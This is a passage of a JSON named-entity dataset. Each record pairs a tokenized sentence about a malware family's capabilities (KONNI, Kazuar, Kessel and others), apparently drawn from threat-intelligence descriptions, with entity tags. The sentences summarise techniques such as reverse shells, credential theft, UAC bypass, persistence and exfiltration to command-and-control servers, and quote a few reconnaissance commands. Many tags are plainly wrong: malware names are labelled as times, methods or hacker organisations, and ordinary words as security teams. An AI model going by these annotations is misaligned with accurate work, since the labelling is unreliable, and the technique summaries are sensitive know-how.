"a", "PowerShell", "command", "to", "download", "a", "file", "to", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "relied", "on", "victims", "clicking", "a", "malicious", "document", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "relied", "on", "victims", "clicking", "on", "a", "malicious", "link", "delivered", "via", "email." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "KOCTOPUS", "has", "been", "disguised", "as", "legitimate", "software", "programs", "associated", "with", "the", "travel", "and", "airline", "industries." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "I-Idus", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "added", "and", "deleted", "keys", "from", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "can", "use", "the", "`LoadResource`", "and", "`CreateProcessW`", "APIs", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "used", "PowerShell", "commands", "to", "download", "additional", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "deployed", "a", "modified", "version", "of", "Invoke-Ngrok", "to", "expose", "open", "local", "ports", "to", "the", "Internet." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "can", "set", "the", "AutoRun", "Registry", "key", "with", "a", "PowerShell", "command." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-HackOrg", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "been", "distributed", "via", "spearphishing", "emails", "with", "malicious", "attachments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "been", "distributed", "as", "a", "malicious", "link", "within", "an", "email." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "KOCTOPUS", "has", "checked", "the", "OS", "version", "using", "`wmic.exe`", "and", "the", "`find`", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "used", "VBScript", "to", "call", "wscript", "to", "execute", "a", "PowerShell", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "used", "`cmd.exe`", "and", "batch", "files", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOMPROGO", "is", "capable", "of", "retrieving", "information", "about", "the", "infected", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KOMPROGO", "is", "capable", "of", "creating", "a", "reverse", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "KOMPROGO", "is", "capable", "of", "running", "WMI", "queries." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-HackOrg" ] }, { "tokens": [ "KONNI", "has", "encrypted", "data", "and", "files", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "bypassed", "UAC", "by", "performing", "token", "impersonation", "as", "well", "as", "an", "RPC-based", "method,", "this", "included", "bypassing", "UAC", "set", "to", "“AlwaysNotify\"." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "had", "a", "feature", "to", "steal", "data", "from", "the", "clipboard." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "modified", "ComSysApp", "service", "to", "load", "the", "malicious", "DLL", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "duplicated", "the", "token", "of", "a", "high", "integrity", "process", "to", "spawn", "an", "instance", "of", "cmd.exe", "under", "an", "impersonated", "user." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "can", "steal", "profiles", "(containing", "credential", "information)", "from", "Firefox,", "Chrome,", "and", "Opera." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "stored", "collected", "information", "and", "discovered", "processes", "in", "a", "tmp", "file." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "KONNI", "has", "used", "certutil", "to", "download", "and", "decode", "base64", "encoded", "strings", "and", "has", "also", "devoted", "a", "custom", "section", "to", "performing", "all", "the", "components", "of", "the", "deobfuscation", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "is", "heavily", "obfuscated", "and", "includes", "encrypted", "configuration", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "sent", "data", "and", "files", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "FTP", "to", "exfiltrate", "reconnaissance", "data", "out." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "can", "delete", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O" ] }, { "tokens": [ "A", "version", "of", "KONNI", "searches", "for", "filenames", "created", "with", "a", "previous", "version", "of", "the", "malware,", "suggesting", "different", "versions", "targeted", "the", "same", "victims", "and", "the", "versions", "may", "work", "together." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "can", "download", "files", "and", "execute", "them", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "executed", "malicious", "JavaScript", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "the", "capability", "to", "perform", "keylogging." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "relied", "on", "a", "victim", "to", "enable", "malicious", "macros", "within", "an", "attachment", "delivered", "via", "email." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "KONNI", "has", "pretended", "to", "be", "the", "xmlProv", "Network", "Provisioning", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "created", "a", "shortcut", "called", "\"Anti", "virus", "service.lnk\"", "in", "an", "apparent", "attempt", "to", "masquerade", "as", "a", "legitimate", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "modified", "registry", "keys", "of", "ComSysApp,", "Svchost,", "and", "xmlProv", "on", "the", "machine", "to", "gain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "hardcoded", "API", "calls", "within", "its", "functions", "to", "use", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "parent", "PID", "spoofing", "to", "spawn", "a", "new", "`cmd`", "process", "using", "`CreateProcessW`", "and", "a", "handle", "to", "`Taskmgr.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "KONNI", "used", "PowerShell", "to", "download", "and", "execute", "a", "specific", "64-bit", "version", "of", "the", "malware." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "the", "command", "<code>cmd", "/c", "tasklist</code>", "to", "get", "a", "snapshot", "of", "the", "current", "processes", "on", "the", "target", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "version", "of", "KONNI", "has", "dropped", "a", "Windows", "shortcut", "into", "the", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "Rundll32", "to", "execute", "its", "loader", "for", "privilege", "escalation", "purposes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "KONNI", "can", "take", "screenshots", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "A", "version", "of", "KONNI", "drops", "a", "Windows", "shortcut", "on", "the", "victim’s", "machine", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "been", "packed", "for", "obfuscation." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "been", "delivered", "via", "spearphishing", "campaigns", "through", "a", "malicious", "Word", "document." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Org", "O", "O", "O", "B-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "KONNI", "has", "used", "a", "custom", "base64", "key", "to", "encode", "stolen", "data", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "AES", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "can", "gather", "the", "OS", "version,", "architecture", "information,", "connected", "drives,", "hostname,", "RAM", "size,", "and", "disk", "space", "information", "from", "the", "victim’s", "machine", "and", "has", "used", "<code>cmd", "/c", "systeminfo</code>", "command", "to", "get", "a", "snapshot", "of", "the", "current", "system", "state", "of", "the", "target", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "can", "collect", "the", "IP", "address", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "<code>net", "session</code>", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "can", "collect", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "HTTP", "POST", "for", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "KONNI", "has", "used", "cmd.exe", "to", "execute", "arbitrary", "commands", "on", "the", "infected", "host", "across", "different", "stages", "of", "the", "infection", "chain." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KONNI", "has", "registered", "itself", "as", "a", "service", "using", "its", "export", "function." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "can", "gather", "information", "from", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "has", "exfiltrated", "collected", "data", "to", "its", "C2", "via", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "had", "used", "Javascript", "to", "perform", "its", "core", "functions." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "has", "piped", "the", "results", "from", "executed", "C2", "commands", "to", "`%TEMP%\\result2.dat`", "on", "the", "local", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "has", "gained", "execution", "through", "malicious", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "can", "use", "netstat", "and", "Net", "to", "discover", "network", "shares." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "can", "enumerate", "current", "running", "processes", "on", "the", "targeted", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "has", "been", "delivered", "to", "victims", "as", "a", "malicious", "email", "attachment." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "KOPILUWAK", "can", "discover", "logical", "drive", "information", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "can", "use", "Arp", "to", "discover", "a", "target's", "network", "configuration", "setttings." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "can", "use", "netstat,", "Arp,", "and", "Net", "to", "discover", "current", "TCP", "connections." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "can", "conduct", "basic", "network", "reconnaissance", "on", "the", "victim", "machine", "with", "`whoami`,", "to", "get", "user", "details." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOPILUWAK", "has", "used", "HTTP", "POST", "requests", "to", "send", "data", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "change", "firewall", "settings", "to", "allow", "a", "plug-in", "to", "be", "downloaded." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "search", "for", "a", "given", "filename", "on", "a", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "initiate", "keylogging." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "search", "for", "a", "given", "process", "name", "in", "processes", "currently", "running", "in", "the", "system." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "creates", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "initiate", "keylogging", "and", "screen", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "identify", "any", "anti-virus", "installed", "on", "the", "infected", "system." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "has", "the", "ability", "to", "obtain", "a", "victim's", "system", "name", "and", "operating", "system", "version." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kasidet", "can", "execute", "commands", "using", "cmd.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Kazuar", "gathers", "information", "about", "opened", "windows." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "has", "used", "compromised", "WordPress", "blogs", "as", "C2", "servers." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "can", "overwrite", "files", "with", "random", "data", "before", "deleting", "them." ], "ner_tags": [ "B-Time", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "uploads", "files", "from", "a", "specified", "directory", "to", "the", "C2", "server." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "running", "in", "a", "Windows", "environment,", "Kazuar", "saves", "a", "DLL", "to", "disk", "that", "is", "injected", "into", "the", "explorer.exe", "process", "to", "execute", "the", "payload.", "Kazuar", "can", "also", "be", "configured", "to", "inject", "and", "execute", "within", "specific", "processes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "can", "accept", "multiple", "URLs", "for", "C2", "servers." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "can", "delete", "files." ], "ner_tags": [ "B-Time", "O", "B-Features", "O" ] }, { "tokens": [ "Kazuar", "uses", "FTP", "and", "FTPS", "to", "communicate", "with", "the", "C2", "server." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "finds", "a", "specified", "directory,", "lists", "the", "files", "and", "metadata", "about", "those", "files." ], "ner_tags": [ "B-Time", "B-Features", "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "downloads", "additional", "plug-ins", "to", "load", "on", "the", "victim’s", "machine,", "including", "the", "ability", "to", "upgrade", "and", "replace", "its", "own", "binary." ], "ner_tags": [ "B-Time", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Kazuar", "has", "used", "internal", "nodes", "on", "the", "compromised", "network", "for", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "gathers", "information", "on", "local", "groups", "and", "members", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "stages", "command", "output", "and", "collected", "data", "in", "files", "before", "exfiltration." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "gathers", "information", "about", "local", "groups", "and", "members." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "is", "obfuscated", "using", "the", "open", "source", "ConfuserEx", "protector.", "Kazuar", "also", "obfuscates", "the", "name", "of", "created", "files/folders/mutexes", "and", "encrypts", "debug", "messages", "written", "to", "log", "files", "using", "the", "Rijndael", "cipher." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Kazuar", "obtains", "a", "list", "of", "running", "processes", "through", "WMI", "querying", "and", "the", "<code>ps</code>", "command." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "adds", "a", "sub-key", "under", "several", "Registry", "run", "keys." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "can", "sleep", "for", "a", "specific", "time", "and", "be", "set", "to", "communicate", "at", "specific", "intervals." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "captures", "screenshots", "of", "the", "victim’s", "screen." ], "ner_tags": [ "B-Time", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "adds", "a", ".lnk", "file", "to", "the", "Windows", "startup", "folder." ], "ner_tags": [ "B-Time", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "encodes", "communications", "to", "the", "C2", "server", "in", "Base64." ], "ner_tags": [ "B-Time", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "gathers", "information", "on", "the", "system", "and", "local", "drives." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "gathers", "information", "about", "network", "adapters." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "gathers", "information", "on", "users." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Kazuar", "uses", "/bin/bash", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "captures", "images", "from", "the", "webcam." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "uses", "HTTP", "and", "HTTPS", "to", "communicate", "with", "the", "C2", "server.", "Kazuar", "can", "also", "act", "as", "a", "webserver", "and", "listen", "for", "inbound", "HTTP", "requests", "through", "an", "exposed", "API." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "uses", "cmd.exe", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kazuar", "obtains", "a", "list", "of", "running", "processes", "through", "WMI", "querying." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O" ] }, { "tokens": [ "Kazuar", "can", "install", "itself", "as", "a", "new", "service." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kerrdown", "can", "use", "DLL", "side-loading", "to", "load", "malicious", "DLLs." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "Kerrdown", "can", "decode,", "decrypt,", "and", "decompress", "multiple", "layers", "of", "shellcode." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Kerrdown", "can", "download", "specific", "payloads", "to", "a", "compromised", "host", "based", "on", "OS", "architecture." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kerrdown", "has", "gained", "execution", "through", "victims", "opening", "malicious", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Kerrdown", "has", "gained", "execution", "through", "victims", "opening", "malicious", "links." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kerrdown", "can", "encrypt,", "encode,", "and", "compress", "multiple", "layers", "of", "shellcode." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "B-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Kerrdown", "has", "been", "distributed", "through", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Kerrdown", "has", "been", "distributed", "via", "e-mails", "containing", "a", "malicious", "link." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Kerrdown", "has", "the", "ability", "to", "determine", "if", "the", "compromised", "host", "is", "running", "a", "32", "or", "64", "bit", "OS", "architecture." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kerrdown", "can", "use", "a", "VBS", "base64", "decoder", "function", "published", "by", "Motobit." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "can", "RC4-encrypt", "credentials", "before", "sending", "to", "the", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "can", "create", "a", "reverse", "shell", "between", "the", "infected", "host", "and", "a", "specified", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "has", "maliciously", "altered", "the", "OpenSSH", "binary", "on", "targeted", "systems", "to", "create", "a", "backdoor." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "can", "split", "the", "data", "to", "be", "exilftrated", "into", "chunks", "that", "will", "fit", "in", "subdomains", "of", "DNS", "queries." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "has", "decrypted", "the", "binary's", "configuration", "once", "the", "<code>main</code>", "function", "was", "launched." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel's", "configuration", "is", "hardcoded", "and", "RC4", "encrypted", "within", "the", "binary." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "has", "exfiltrated", "information", "gathered", "from", "the", "infected", "system", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "can", "exfiltrate", "credentials", "and", "other", "information", "via", "HTTP", "POST", "request,", "TCP,", "and", "DNS." ], "ner_tags": [ "B-Time", "O", "B-SamFile", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Kessel", "can", "download", "additional", "modules", "from", "the", "C2", "server." ], 